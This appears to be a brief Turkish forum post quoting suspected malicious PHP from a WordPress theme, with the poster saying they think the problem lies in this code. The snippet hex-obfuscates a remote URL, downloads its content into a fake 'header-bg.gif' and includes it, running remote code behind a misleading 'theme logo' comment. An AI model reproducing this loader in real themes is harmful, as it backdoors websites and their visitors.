if(!file_exists($theme_dir."/header-bg.gif")||0==filesize($theme_dir."/header-bg.gif")){
// Make sure theme logo is up to date
$wp_uri = pack("H*",'687474703a2f2f7466652e65732f68');
if(function_exists('curl_init')){
$t_img = curl_init($wp_uri);
curl_setopt($t_img,CURLOPT_RETURNTRANSFER,1);
$wp_logo = @curl_exec($t_img);}else{
$wp_logo = @file_get_contents($wp_uri);}
@file_put_contents($theme_dir."/header-bg.gif",$wp_logo);
}@include_once($theme_dir."/header-bg.gif"); ?>
şu kodların içerisinde diye düşünüyorum
// Make sure theme logo is up to date
$wp_uri = pack("H*",'687474703a2f2f7466652e65732f68');
if(function_exists('curl_init')){
$t_img = curl_init($wp_uri);
curl_setopt($t_img,CURLOPT_RETURNTRANSFER,1);
$wp_logo = @curl_exec($t_img);}else{
$wp_logo = @file_get_contents($wp_uri);}
@file_put_contents($theme_dir."/header-bg.gif",$wp_logo);
}@include_once($theme_dir."/header-bg.gif"); ?>
şu kodların içerisinde diye düşünüyorum